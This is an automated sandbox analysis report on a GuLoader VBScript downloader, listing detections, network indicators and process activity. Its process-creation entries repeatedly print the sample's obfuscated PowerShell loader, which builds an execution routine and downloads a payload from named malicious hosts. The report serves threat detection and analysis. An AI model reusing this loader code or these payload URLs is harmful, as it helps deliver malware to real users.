Windows Analysis Report
Blikvarefabrikken.vbs

Overview

General Information

Sample name:	Blikvarefabrikken.vbs
Analysis ID:	1658919
MD5:	b7d8d9cb6cffa5ae6ecb12d0b1a85b27
SHA1:	cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
SHA256:	327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
Tags:	vbsuser-abuse_ch
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Uses ping.exe to check the status of other devices and networks

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Blikvarefabrikken.vbs

Virustotal: Detection: 8%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Source: unknown

HTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb> source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb# source: powershell.exe, 00000007.00000002.2106847629.0000000006D58000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /images/innocence.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: karunavriksha.orgConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /images/innocence.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: karunavriksha.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: karunavriksha.org

Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.o
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.or
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/s
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/se
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/sea
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/sear
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/searc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/i
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/in
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/inn
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/inno
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innoc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innoce
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocen
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocenc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence.
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence.m
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence.ms
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence.mso
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://alhalalasia.org/search/innocence.msoP
Source: svchost.exe, 00000009.00000002.2339023640.0000019942800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://karunavriksha.org
Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB;r
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000009.00000003.1203845695.00000199426A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.o
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.or
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/i
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/im
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/ima
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/imag
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/image
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/i
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/in
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/inn
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/inno
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innoc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innoce
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocen
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocenc
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence.
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence.m
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence.ms
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence.mso
Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karunavriksha.org/images/innocence.msolb
Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443

Source: unknown

HTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6456.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9C1D0B5FA	4_2_00007FF9C1D0B5FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9C1D0C3AA	4_2_00007FF9C1D0C3AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9C1DD678D	4_2_00007FF9C1DD678D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9C1DDBEDA	4_2_00007FF9C1DDBEDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00B56F68	7_2_00B56F68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00B56F68	7_2_00B56F68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08721B4F	7_2_08721B4F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0872647D	7_2_0872647D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_087204F9	7_2_087204F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0872048A	7_2_0872048A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_087225A9	7_2_087225A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08724E51	7_2_08724E51

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8124
Source: unknown	Process created: Commandline size = 8124
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8124	Jump to behavior

Source: amsi32_6456.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6456

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara 